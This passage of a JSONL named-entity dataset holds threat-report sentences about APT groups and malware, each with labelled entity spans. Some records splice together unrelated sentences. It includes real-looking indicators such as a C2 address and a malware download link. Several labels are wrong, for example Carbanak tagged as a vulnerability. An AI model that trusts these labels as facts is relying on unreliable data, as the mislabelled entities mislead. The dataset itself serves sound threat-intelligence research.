compromised user": [[279, 314]]}, "info": {"id": "cyberner_stix_train_001308", "source": "cyberner_stix_train"}} {"text": "MINIDUKE : First known activity Loader July 2010 , Backdoor May 2011 Most recent known activity Loader : Spring 2015 , Backdoor : Summer 2014 C&C communication methods HTTP(S) , Twitter , Known toolset components Downloader , Backdoor , Loader .", "spans": {"MALWARE: MINIDUKE": [[0, 8]], "TOOL: C&C": [[142, 145]], "TOOL: Twitter": [[178, 185]], "TOOL: Downloader": [[213, 223]], "TOOL: Backdoor": [[226, 234]], "TOOL: Loader": [[237, 243]]}, "info": {"id": "cyberner_stix_train_001309", "source": "cyberner_stix_train"}} {"text": "Microsoft patched this vulnerability in September 2012 , 
suggesting that this watering hole attack used an older vulnerability , which aligns with the threat groups continued use of older vulnerabilities in their spear-phishing efforts . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "THREAT_ACTOR: threat groups": [[151, 164]], "ORGANIZATION: individual": [[260, 270]], "THREAT_ACTOR: actors": [[284, 290]]}, "info": {"id": "cyberner_stix_train_001310", "source": "cyberner_stix_train"}} {"text": "Static analysis of the code reveals that the malware downloads the overlay template to use against any of the bank ( s ) it is targeting . Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions . The obfuscations looked similar to the ones explained in Hex-Rays blog , These disruptive cyber operations began in January 2022 , prior to Russia ’s illegal further invasion of Ukraine and have continued throughout the war .", "spans": {"THREAT_ACTOR: APT38": [[152, 157]], "ORGANIZATION: financial institutions": [[218, 240]], "ORGANIZATION: Ukraine": [[421, 428]]}, "info": {"id": "cyberner_stix_train_001311", "source": "cyberner_stix_train"}} {"text": "This analysis dissects FakeSpy ’ s Chunghwa Post app version , which emerged in April 2020 . On June 19 , 2019 , FireEye’s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances . 
RATs such as NjRat and infostealers like Lokibot were leveraging the same C2 infrastructure as that of the targeted attacks .", "spans": {"MALWARE: FakeSpy": [[23, 30]], "ORGANIZATION: FireEye’s": [[113, 122]], "ORGANIZATION: FireEye": [[216, 223]], "MALWARE: RATs": [[255, 259]], "MALWARE: NjRat": [[268, 273]], "MALWARE: Lokibot": [[296, 303]], "TOOL: C2": [[329, 331]]}, "info": {"id": "cyberner_stix_train_001312", "source": "cyberner_stix_train"}} {"text": "TG-3390 actors have used Java exploits in their SWCs . Based on multiple active compromises by the Axiom threat group , Novetta was able to capture and analyze new Winnti malware samples .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "VULNERABILITY: Java exploits": [[25, 38]], "TOOL: SWCs": [[48, 52]], "ORGANIZATION: Novetta": [[120, 127]], "MALWARE: Winnti malware samples": [[164, 186]]}, "info": {"id": "cyberner_stix_train_001313", "source": "cyberner_stix_train"}} {"text": "Additionally new endpoint was added that seems related to downloading a module for the malware , probably with new features or configuration . APT10 is a threat actor that has been active since at least 2009 . Logs keystrokes and mouse movement Captures screenshots Opens cmd.exe shell Enumerates processes Executes programs Removes itself Enumerates all opening TCP and UDP ports .", "spans": {"THREAT_ACTOR: APT10": [[143, 148]], "FILEPATH: cmd.exe": [[272, 279]]}, "info": {"id": "cyberner_stix_train_001314", "source": "cyberner_stix_train"}} {"text": "For this task , I used PassiveTotal ’s Passive DNS and AutoFocus Maltego transforms .", "spans": {"TOOL: PassiveTotal ’s Passive DNS": [[23, 50]], "TOOL: AutoFocus Maltego transforms": [[55, 83]]}, "info": {"id": "cyberner_stix_train_001315", "source": "cyberner_stix_train"}} {"text": "We named the malware Skygofree , because we found the word in one of the domains * . MuddyWater first surfaced in 2017 . 
The group has been known to target organizations in order to use their access to then compromise additional victims .", "spans": {"MALWARE: Skygofree": [[21, 30]], "THREAT_ACTOR: MuddyWater": [[85, 95]]}, "info": {"id": "cyberner_stix_train_001316", "source": "cyberner_stix_train"}} {"text": "The block is decrypted using a customized algorithm that uses a key derived from the original malware dropper ’ s TimeDateStamp field multiplied by 5 . APT33 often conducts spear-phishing operations using a built-in phishing module . Side-loaded DLL Loads next-stage payload using custom .png steganography Uses AES128 implementation from Crypto++ library for payload decryption Known to load Denes backdoor , might possibly be used also with other payloads . Threat actors regularly adapt and make use of red team tools - such as commercial and publicly available exploitation frameworks - to facilitate real world attacks , like TEMP.Veles ’ use of METERPRETER during .", "spans": {"THREAT_ACTOR: APT33": [[152, 157]], "TOOL: DLL": [[246, 249]], "TOOL: custom .png steganography": [[281, 306]], "TOOL: Crypto++ library": [[339, 355]], "MALWARE: Denes backdoor": [[393, 407]], "ORGANIZATION: Threat actors": [[460, 473]], "TOOL: red team tools": [[506, 520]], "MALWARE: TEMP.Veles": [[631, 641]], "TOOL: METERPRETER": [[651, 662]]}, "info": {"id": "cyberner_stix_train_001317", "source": "cyberner_stix_train"}} {"text": "All of the files that are being uploaded or downloaded are zip files encrypted by AES with ECB mode . During the same time period , APT33 also targeted companies in South Korea involved in oil refining and petrochemicals . XOR and RC4 encryption is used with quite long unique keys for different . 
By creating awareness and using the right solutions , both individuals and organizations can take the steps needed to defend against the malicious tactics used by threat actors like the Winnti group .", "spans": {"THREAT_ACTOR: APT33": [[132, 137]], "ORGANIZATION: oil refining": [[189, 201]], "ORGANIZATION: petrochemicals": [[206, 220]], "THREAT_ACTOR: Winnti group": [[484, 496]]}, "info": {"id": "cyberner_stix_train_001318", "source": "cyberner_stix_train"}} {"text": "Then , it uses the accessibility service for its malicious operations , some of which include : Preventing the user from uninstalling the app Becoming the default SMS app by changing device settings Monitoring the currently running application ( s ) Scraping on-screen text Android operating systems include many dialog screens that require the denial , or approval , of app permissions and actions that have to receive input from the user by tapping a button on the screen . Based on our observations , this group uses a variety of different methods to either compromise or acquire already compromised payment card credentials . Initial inspection of this attack suggested this was again the OilRig campaign using their existing toolset , but further examination revealed not only new variants of the delivery document we named Clayslide , but also a different payload embedded inside it .", "spans": {"SYSTEM: Android": [[274, 281]], "THREAT_ACTOR: group": [[509, 514]], "MALWARE: Clayslide": [[829, 838]]}, "info": {"id": "cyberner_stix_train_001319", "source": "cyberner_stix_train"}} {"text": "The parameters “ wth ” and “ qlt ” specify “ width ” and “ quality ” .", "spans": {}, "info": {"id": "cyberner_stix_train_001320", "source": "cyberner_stix_train"}} {"text": "A malware sample using two separate unique user agent strings is uncommon .", "spans": {}, "info": {"id": "cyberner_stix_train_001321", "source": "cyberner_stix_train"}} {"text": "We have seen two types of apps that use this custom-made SDK . 
Only one incident involving a Russian bank was promptly identified and prevented that is known to Group-IB . ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi , and is capable of performing file uploads and downloads , file execution , and process and directory listings . Say these arguments extend through the 2024 election — what happens if control of the White House or Congress switches between parties ?", "spans": {"ORGANIZATION: bank": [[101, 105]], "ORGANIZATION: Group-IB": [[161, 169]], "MALWARE: ELMER": [[172, 177]], "TOOL: Delphi": [[235, 241]]}, "info": {"id": "cyberner_stix_train_001322", "source": "cyberner_stix_train"}} {"text": "Cannon has not been previously observed in use by the Sofacy group and contains a novel email-based C2 communication channel .", "spans": {"MALWARE: Cannon": [[0, 6]], "THREAT_ACTOR: Sofacy": [[54, 60]], "TOOL: C2": [[100, 102]]}, "info": {"id": "cyberner_stix_train_001323", "source": "cyberner_stix_train"}} {"text": "It has been shortened for brevity . According to Kaspersky Lab 's report , this threat actor has been active since as early as 2004 ; however , the highest volume of activity occurred from 2010 – 2013 . The webmail addresses , while unknown , were possibly the personal-use addresses of the individuals whose corporate domain emails were targeted . Apple had to roll back and then re - release a security update that addressed an actively exploited vulnerability in WebKit .", "spans": {"ORGANIZATION: Kaspersky Lab": [[49, 62]], "TOOL: emails": [[326, 332]], "ORGANIZATION: Apple": [[349, 354]], "VULNERABILITY: exploited vulnerability": [[439, 462]], "ORGANIZATION: WebKit": [[466, 472]]}, "info": {"id": "cyberner_stix_train_001324", "source": "cyberner_stix_train"}} {"text": "executes netwf.dll netwf.dll :", "spans": {"FILEPATH: netwf.dll": [[9, 18], [19, 28]]}, "info": {"id": "cyberner_stix_train_001325", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //sagawa-reg [ . 
In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others . This campaign originally came in via phishing emails that contained an attached Word document with embedded macros , Carbon Black located roughly 180 variants in the wild . Problems also arise when organizations turn a blind eye to the usage of commercial spyware .", "spans": {"THREAT_ACTOR: Sofacy group": [[44, 56]], "TOOL: CORESHELL": [[127, 136]], "TOOL: SPLM": [[139, 143]], "TOOL: Xagent": [[150, 156]], "TOOL: CHOPSTICK": [[163, 172]], "TOOL: JHUHUGIT": [[177, 185]], "TOOL: Carberp": [[222, 229]], "TOOL: AZZY": [[242, 246]], "TOOL: EVILTOSS": [[277, 285]], "TOOL: Word document": [[422, 435]], "ORGANIZATION: Carbon Black": [[459, 471]], "ORGANIZATION: organizations": [[540, 553]]}, "info": {"id": "cyberner_stix_train_001326", "source": "cyberner_stix_train"}} {"text": "There is no doubt that BitPaymer ransomware operations are proving successful for this criminal group , with an average estimate take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan . The common use of the Enfal Trojan suggests that Shadow Network may be exchanging tools and techniques .", "spans": {"TOOL: BitPaymer": [[23, 32]], "TOOL: ransomware": [[33, 43]], "TOOL: Dridex banking trojan": [[249, 270]], "MALWARE: Enfal Trojan": [[295, 307]]}, "info": {"id": "cyberner_stix_train_001327", "source": "cyberner_stix_train"}} {"text": "The Trojan also registered in Google Cloud Messaging ( GCM ) , meaning it could then receive commands via that service . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) . 
We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America .", "spans": {"SYSTEM: Google Cloud Messaging ( GCM )": [[30, 60]], "MALWARE: 32-bit Windows executable file": [[166, 196]], "TOOL: Remote Access Trojan": [[215, 235]], "TOOL: RAT": [[238, 241]], "THREAT_ACTOR: Lazarus": [[279, 286]], "ORGANIZATION: Trend Micro": [[337, 348]], "MALWARE: BKDR_BINLODR.ZNFJ-A": [[352, 371]], "ORGANIZATION: financial institutions": [[399, 421]]}, "info": {"id": "cyberner_stix_train_001328", "source": "cyberner_stix_train"}} {"text": "Given this requirement , SilverTerrier actors often rely on Dynamic DNS and virtual private servers to provide a layer of obfuscation to protect their identities . Turla is a notorious group that has been targeting diplomats .", "spans": {"THREAT_ACTOR: SilverTerrier actors": [[25, 45]], "TOOL: Dynamic DNS": [[60, 71]], "TOOL: virtual private servers": [[76, 99]], "THREAT_ACTOR: Turla": [[164, 169]], "ORGANIZATION: diplomats": [[215, 224]]}, "info": {"id": "cyberner_stix_train_001329", "source": "cyberner_stix_train"}} {"text": "In addition to using several publicly known injection methods to perform this task , it also takes advantage of an obscure operating system feature known as hot patching . Today Kaspersky Lab 's team of experts published a new research report about NetTraveler , which is a family of malicious programs used by APT actors to successfully compromise more than 350 high-profile victims in 40 countries .", "spans": {"ORGANIZATION: Kaspersky Lab": [[178, 191]], "MALWARE: NetTraveler": [[249, 260]]}, "info": {"id": "cyberner_stix_train_001330", "source": "cyberner_stix_train"}} {"text": "Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India . 
The malware will install two proxies running on local host port 5555 and 5588 .", "spans": {"ORGANIZATION: government organizations": [[22, 46]], "ORGANIZATION: information technology services": [[60, 91]], "ORGANIZATION: government": [[101, 111]], "TOOL: proxies": [[176, 183]]}, "info": {"id": "cyberner_stix_train_001331", "source": "cyberner_stix_train"}} {"text": "Upgrade PowerShell to new versions with enhanced logging features and monitor the logs to detect usage of PowerShell commands , which are often malware-related .", "spans": {"TOOL: PowerShell": [[8, 18], [106, 116]]}, "info": {"id": "cyberner_stix_train_001332", "source": "cyberner_stix_train"}} {"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services .", "spans": {"MALWARE: Canhadr/Ndriver": [[29, 44]], "MALWARE: Metel": [[251, 256]], "ORGANIZATION: banking": [[262, 269]], "MALWARE: Trojan": [[270, 276]], "MALWARE: Corkow": [[293, 299]]}, "info": {"id": "cyberner_stix_train_001333", "source": "cyberner_stix_train"}} {"text": ") , and less screen real estate for victims to identify potential indicators of a threat . The Lazarus Group was first identified in Novetta 's report Operation Blockbuster in February 2016 . Among the archiving tools we tried, WinRar 3.30 behaved differently and . 
It has two components Loader and core module .", "spans": {"THREAT_ACTOR: Lazarus Group": [[95, 108]], "ORGANIZATION: Novetta": [[133, 140]], "TOOL: WinRar": [[228, 234]]}, "info": {"id": "cyberner_stix_train_001334", "source": "cyberner_stix_train"}} {"text": "The threat actors saved both the SYSTEM file ( system.hive ) and NTDS.dit in the compromised host's c:\\windows\\temp directory .", "spans": {"FILEPATH: system.hive": [[47, 58]], "FILEPATH: NTDS.dit": [[65, 73]]}, "info": {"id": "cyberner_stix_train_001335", "source": "cyberner_stix_train"}} {"text": "How do you know if your Google account is breached ? APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . opaque predicates pattern matching functions are called . Mandiant first observed the self - proclaimed hacktivist group calling itself \" Anonymous Sudan \" in January 2023 and the group soon after declared allegiance to KillNet .", "spans": {"ORGANIZATION: Google": [[24, 30]], "THREAT_ACTOR: APT38": [[53, 58]], "ORGANIZATION: banks": [[104, 109]], "ORGANIZATION: financial institutions": [[120, 142]], "ORGANIZATION: Mandiant": [[263, 271]], "THREAT_ACTOR: Anonymous Sudan": [[343, 358]]}, "info": {"id": "cyberner_stix_train_001336", "source": "cyberner_stix_train"}} {"text": "The below code snippet is currently isolated and dormant . In August 2015 a new incident related to the Corkow ( Metel ) Trojan was detected . Some of them exploit CVE-2017-0199 , loading it using VBS and PowerShell scripts and then installing customized versions of RevengeRAT , NjRAT , NanoCoreRAT , 888 RAT and other custom malware such as ProCC in the victim ’s machine . 
For those who fall outside of that demographic , it ’s interesting that this group is still relying on the user enabling macros in Office , since Microsoft disabled those by default earlier this year .", "spans": {"TOOL: Corkow": [[104, 110]], "THREAT_ACTOR: Metel": [[113, 118]], "VULNERABILITY: CVE-2017-0199": [[164, 177]], "TOOL: PowerShell": [[205, 215]], "MALWARE: RevengeRAT": [[267, 277]], "MALWARE: NjRAT": [[280, 285]], "MALWARE: NanoCoreRAT": [[288, 299]], "MALWARE: 888 RAT": [[302, 309]], "MALWARE: ProCC": [[343, 348]], "TOOL: Microsoft": [[522, 531]]}, "info": {"id": "cyberner_stix_train_001337", "source": "cyberner_stix_train"}} {"text": "The attack wave started in late July 2011 and continued into midSeptember 2011 .", "spans": {}, "info": {"id": "cyberner_stix_train_001338", "source": "cyberner_stix_train"}} {"text": "The HTA ’s VBScript changes the window size and location and then uses PowerShell to download yet another script : power.ps1 .", "spans": {"TOOL: HTA": [[4, 7]], "TOOL: VBScript": [[11, 19]], "SYSTEM: window": [[32, 38]], "TOOL: PowerShell": [[71, 81]], "FILEPATH: power.ps1": [[115, 124]]}, "info": {"id": "cyberner_stix_train_001339", "source": "cyberner_stix_train"}} {"text": "The adware functionality is the same in all the apps we analyzed . Kaspersky also observed some activity from Gaza Team and MuddyWater . 
Here is the complete list of files internally used by the RAT: error.tmp (the log file of the keylogger) tedsul.ocx helpsol.ocx trepsl.ocx psltred.ocx solhelp.ocx sulted.ocx .", "spans": {"ORGANIZATION: Kaspersky": [[67, 76]], "THREAT_ACTOR: MuddyWater": [[124, 134]], "FILEPATH: error.tmp": [[200, 209]], "FILEPATH: tedsul.ocx": [[242, 252]], "FILEPATH: helpsol.ocx": [[253, 264]], "FILEPATH: trepsl.ocx": [[265, 275]], "FILEPATH: psltred.ocx": [[276, 287]], "FILEPATH: solhelp.ocx": [[288, 299]], "FILEPATH: sulted.ocx": [[300, 310]]}, "info": {"id": "cyberner_stix_train_001340", "source": "cyberner_stix_train"}} {"text": "Generally , after an application gets banned from an official app store , such as Google Play , users try to find alternative ways to download the app . The recent wave of FASTCash attacks demonstrates that financially motivated attacks are not simply a passing interest for the Lazarus group and can now be considered one of its core activities . The library used to hide Winnti ’s system activity is a copy of the open-source userland rootkit Azazel , with minor changes .", "spans": {"SYSTEM: Google Play": [[82, 93]], "THREAT_ACTOR: Lazarus group": [[279, 292]], "MALWARE: Winnti": [[373, 379]], "TOOL: Azazel": [[445, 451]]}, "info": {"id": "cyberner_stix_train_001341", "source": "cyberner_stix_train"}} {"text": "The DLL side-loaded stage 4 malware mimicking a real export table to avoid detection Stage 4 : The memory loader – Fun injection with GDI function hijacking Depending on how stage 4 was launched , two different things may happen : In the low-integrity case ( under UAC ) the installer simply injects the stage 5 malware into the bogus explorer.exe process started earlier and terminates In the high-integrity case ( with administrative privileges or after UAC bypass ) , the code searches for the process hosting the Plug and Play service ( usually svchost.exe SecureWorks® Counter Threat Unit™ ( CTU ) researchers analyzed a phishing campaign that 
targeted a Middle Eastern organization in early January 2017 . Finally , the loader will decrypt the payload to a memory buffer and overwrite the previously found return address with the pointer to that buffer , ensuring that the malicious shellcode will be executed when the DLL attempts to return to the caller . Examples of indicators of attack , and why they matter", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit™": [[561, 594]], "ORGANIZATION: CTU": [[597, 600]], "ORGANIZATION: organization": [[675, 687]], "TOOL: DLL": [[925, 928]]}, "info": {"id": "cyberner_stix_train_001342", "source": "cyberner_stix_train"}} {"text": "By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates .", "spans": {"ORGANIZATION: high-tech": [[13, 22]], "ORGANIZATION: manufacturing": [[27, 40]], "THREAT_ACTOR: DragonOK": [[74, 82]], "ORGANIZATION: economic": [[132, 140]]}, "info": {"id": "cyberner_stix_train_001343", "source": "cyberner_stix_train"}} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . XBOW 's capabilities are derived from BIFROSE and KIVARS ; Shrouded Crossbow gets its name from its unique mutex format .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "MALWARE: XBOW": [[199, 203]], "MALWARE: BIFROSE": [[237, 244]], "MALWARE: KIVARS": [[249, 255]]}, "info": {"id": "cyberner_stix_train_001344", "source": "cyberner_stix_train"}} {"text": "BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . 
The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including research and pharmaceutical companies .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "TOOL: Daserf malware": [[96, 110]], "VULNERABILITY: Flash exploits": [[136, 150]], "MALWARE: Epic Turla": [[190, 200]], "ORGANIZATION: pharmaceutical companies": [[292, 316]]}, "info": {"id": "cyberner_stix_train_001345", "source": "cyberner_stix_train"}} {"text": "With their gaps in visibility , these organizations can have a very difficult time distinguishing adversary activity from that of legitimate users , pushing detection times out to weeks , months , or even years .", "spans": {}, "info": {"id": "cyberner_stix_train_001346", "source": "cyberner_stix_train"}} {"text": "FURTHER READING New type of auto-rooting Android adware is nearly impossible to remove Researchers from security firm Check Point Software said the malware installs more than 50,000 fraudulent apps each day , displays 20 million malicious advertisements , and generates more than $ 300,000 per month in revenue . Since they first emerged back in 2007 with a series of cyberespionage attacks against the South Korean government , these threat actors have successfully managed to pull off some of the most notable and devastating targeted attacks—such as the widely-reported 2014 Sony hack and the 2016 attack on a Bangladeshi bank—in recent history . APT33 : 95.211.191.117 update-sec.com . 
None DGA Formula The algorithm for generating domains has been updated and includes the TLDs toplevel domains of .space , .net , .dynu.net , and .top to evade detection of security vendors using the previously published DGA domain generation algorithm", "spans": {"SYSTEM: Android": [[41, 48]], "ORGANIZATION: Check Point Software": [[118, 138]], "ORGANIZATION: government": [[416, 426]], "THREAT_ACTOR: threat actors": [[435, 448]], "THREAT_ACTOR: APT33": [[650, 655]], "IP_ADDRESS: 95.211.191.117": [[658, 672]], "DOMAIN: update-sec.com": [[673, 687]]}, "info": {"id": "cyberner_stix_train_001347", "source": "cyberner_stix_train"}} {"text": "Both apps shared the same C & C server , but we couldn ’ t investigate the latter as it had already been removed from the Google Play store . One of the most interesting things to occur during one of Waterbug’s recent campaigns was that during an attack against one target in the Middle East , Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim’s network . 
Based on our analysis of public and private information from submissions , along with product telemetry , it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017 .", "spans": {"SYSTEM: Google Play store": [[122, 139]], "THREAT_ACTOR: Waterbug’s": [[200, 210]], "THREAT_ACTOR: Waterbug": [[294, 302]], "THREAT_ACTOR: group": [[364, 369]], "MALWARE: Proxysvc": [[547, 555]], "MALWARE: Destover": [[584, 592]]}, "info": {"id": "cyberner_stix_train_001348", "source": "cyberner_stix_train"}} {"text": "First , they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours .", "spans": {"TOOL: COM": [[17, 20]]}, "info": {"id": "cyberner_stix_train_001349", "source": "cyberner_stix_train"}} {"text": "Malware authors in the past have often coded a “ safety net ” into their malware to prevent them from accidentally infecting their own computers and devices . The Gamaredon Group primarily makes use of compromised domains , dynamic DNS providers , Russian and Ukrainian country code top-level domains ( ccTLDs ) , and Russian hosting providers to distribute their custom-built malware . 
and so on ) This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[163, 178]], "ORGANIZATION: dynamic DNS providers": [[224, 245]], "ORGANIZATION: hosting providers": [[326, 343]], "TOOL: custom-built malware": [[364, 384]], "VULNERABILITY: server - side request forgery ( SSRF )": [[440, 478]]}, "info": {"id": "cyberner_stix_train_001350", "source": "cyberner_stix_train"}} {"text": "As mentioned in our previous blogs on DealersChoice , the payload of choice for previous variants was SofacyCarberp ( Seduploader ) , but we have no evidence to suggest this tool was used in this attack .", "spans": {"TOOL: DealersChoice": [[38, 51]], "MALWARE: SofacyCarberp": [[102, 115]], "MALWARE: Seduploader": [[118, 129]]}, "info": {"id": "cyberner_stix_train_001351", "source": "cyberner_stix_train"}} {"text": "By accessing and stealing this data , Eventbot has the potential to access key business data , including financial data . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy . 
On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"MALWARE: Eventbot": [[38, 46]], "ORGANIZATION: Trend Micro": [[165, 176]], "MALWARE: espionage toolkit": [[226, 243]], "TOOL: KeyBoy": [[324, 330]], "THREAT_ACTOR: actors": [[364, 370]], "ORGANIZATION: individual": [[405, 415]]}, "info": {"id": "cyberner_stix_train_001352", "source": "cyberner_stix_train"}} {"text": "Successfully evicting TG-3390 from an environment requires a coordinated plan to remove all access points , including remote access tools and web shells .", "spans": {"THREAT_ACTOR: TG-3390": [[22, 29]], "TOOL: remote access tools": [[118, 137]], "TOOL: web shells": [[142, 152]]}, "info": {"id": "cyberner_stix_train_001353", "source": "cyberner_stix_train"}} {"text": "As soon as the victim tries to log in , it stores the victim 's credentials in /storage/0/DCIM/.fdat Facebook Login Figure 7 : Fake Facebook login The second command is IODBSSUEEZ , which further sends stolen credentials to the C & C server , as seen in Figure 8 . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . They compromised various banking systems , including the Russian Central Bank 's Automated Workstation Client , ATMs , and card processing .", "spans": {"SYSTEM: Facebook": [[101, 109], [132, 140]], "MALWARE: Bemstour": [[293, 301]], "MALWARE: Pirpi": [[332, 337]], "MALWARE: backdoor": [[338, 346]], "TOOL: different": [[406, 415]], "TOOL: backdoor": [[416, 424]]}, "info": {"id": "cyberner_stix_train_001354", "source": "cyberner_stix_train"}} {"text": "These will be executed in a WebView object created by the trojan . This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 . 
Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions .", "spans": {"THREAT_ACTOR: APT38": [[235, 240]], "ORGANIZATION: financial institutions": [[301, 323]]}, "info": {"id": "cyberner_stix_train_001355", "source": "cyberner_stix_train"}} {"text": "Additionally , rootdaemon attempts to remove its own power usage statistics from Huawei phones ' SystemManager : Similarly , the malicious application probably attempts to minimize traces on Samsung phones by adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/apm_sp_status_of_apps.xml the following lines : And adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/com.samsung.android.securitylogagent_preferences.xml For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug . JhoneRAT : https://drive.google.com/uc?export=downloadid=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd . 
Money", "spans": {"ORGANIZATION: Huawei": [[81, 87]], "ORGANIZATION: Samsung": [[191, 198]], "THREAT_ACTOR: Sowbug": [[508, 514]], "TOOL: Felismus backdoor": [[567, 584]], "MALWARE: adobecms.exe": [[644, 656]], "MALWARE: CSIDL_WINDOWS\\debug": [[660, 679]], "MALWARE: JhoneRAT": [[682, 690]], "DOMAIN: https://drive.google.com/uc?export=downloadid=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd": [[693, 772]]}, "info": {"id": "cyberner_stix_train_001356", "source": "cyberner_stix_train"}} {"text": "Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures .", "spans": {"MALWARE: HttpBrowser": [[24, 35]]}, "info": {"id": "cyberner_stix_train_001357", "source": "cyberner_stix_train"}} {"text": "The final part of the VBA script changes the properties of these two files , setting their attributes to Hidden .", "spans": {"TOOL: VBA": [[22, 25]]}, "info": {"id": "cyberner_stix_train_001358", "source": "cyberner_stix_train"}} {"text": "For persistence , the loader will write the path to this batch file to the following registry key .", "spans": {}, "info": {"id": "cyberner_stix_train_001359", "source": "cyberner_stix_train"}} {"text": "Intrigued , we continued our search and found more interesting clues that could reveal some detailed information about the owners of the infected devices . FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors . This tool was downloaded several times between 23:29 on February 12 and 07:47 on February 13 . 
In October 2019 , ESET published “ Operation Ghost ” detailing a set of new trojans used by the Dukes , including PolyglotDuke , RegDuke and FatDuke .", "spans": {"TOOL: FALLCHILL": [[156, 165]], "TOOL: HIDDEN COBRA malware": [[220, 240]], "THREAT_ACTOR: HIDDEN COBRA actors": [[321, 340]], "ORGANIZATION: ESET": [[456, 460]], "THREAT_ACTOR: Dukes": [[534, 539]], "MALWARE: PolyglotDuke": [[552, 564]], "MALWARE: RegDuke": [[567, 574]], "MALWARE: FatDuke": [[579, 586]]}, "info": {"id": "cyberner_stix_train_001360", "source": "cyberner_stix_train"}} {"text": "Most of the additional samples were the Delphi and AutoIT variants as reported by ESET .", "spans": {"TOOL: Delphi": [[40, 46]], "TOOL: AutoIT": [[51, 57]], "ORGANIZATION: ESET": [[82, 86]]}, "info": {"id": "cyberner_stix_train_001361", "source": "cyberner_stix_train"}} {"text": "] com http : //www.adsuperiorstore [ . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . The group , which we call Seedworm ( aka MuddyWater ) , has been operating since at least 2017 , with its most recent activity observed in December 2018 .", "spans": {"VULNERABILITY: Carbanak": [[39, 47]], "TOOL: Carberp": [[90, 97]], "THREAT_ACTOR: espionage": [[115, 124]], "THREAT_ACTOR: Seedworm": [[223, 231]], "THREAT_ACTOR: MuddyWater": [[238, 248]]}, "info": {"id": "cyberner_stix_train_001362", "source": "cyberner_stix_train"}} {"text": "However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . 
Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies .", "spans": {"THREAT_ACTOR: Cleaver": [[38, 45]], "THREAT_ACTOR: Cyber Army": [[99, 109]], "THREAT_ACTOR: Ashiyane": [[124, 132]], "ORGANIZATION: Syrian Electronic Army": [[155, 177]], "ORGANIZATION: High-Tech": [[332, 341]], "ORGANIZATION: Cyber Security Companies": [[346, 370]]}, "info": {"id": "cyberner_stix_train_001363", "source": "cyberner_stix_train"}} {"text": "The embedded app appears to be a media player . APT41 has targeted organizations in 14 countries (and Hong Kong) over seven years , including: France , India , Italy , Japan , Myanmar , the Netherlands , Singapore , South Korea , South Africa , Switzerland , Thailand , Turkey , the United Kingdom , and the United States (Figure 1) . Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics .", "spans": {"THREAT_ACTOR: APT41": [[48, 53]], "THREAT_ACTOR: actors": [[489, 495]]}, "info": {"id": "cyberner_stix_train_001364", "source": "cyberner_stix_train"}} {"text": "Some of the CozyDuke spear-phishing emails from early July posed as e-fax arrival notifications , a popular theme for spam emails , and used the same “ US letter fax test page ” decoy document 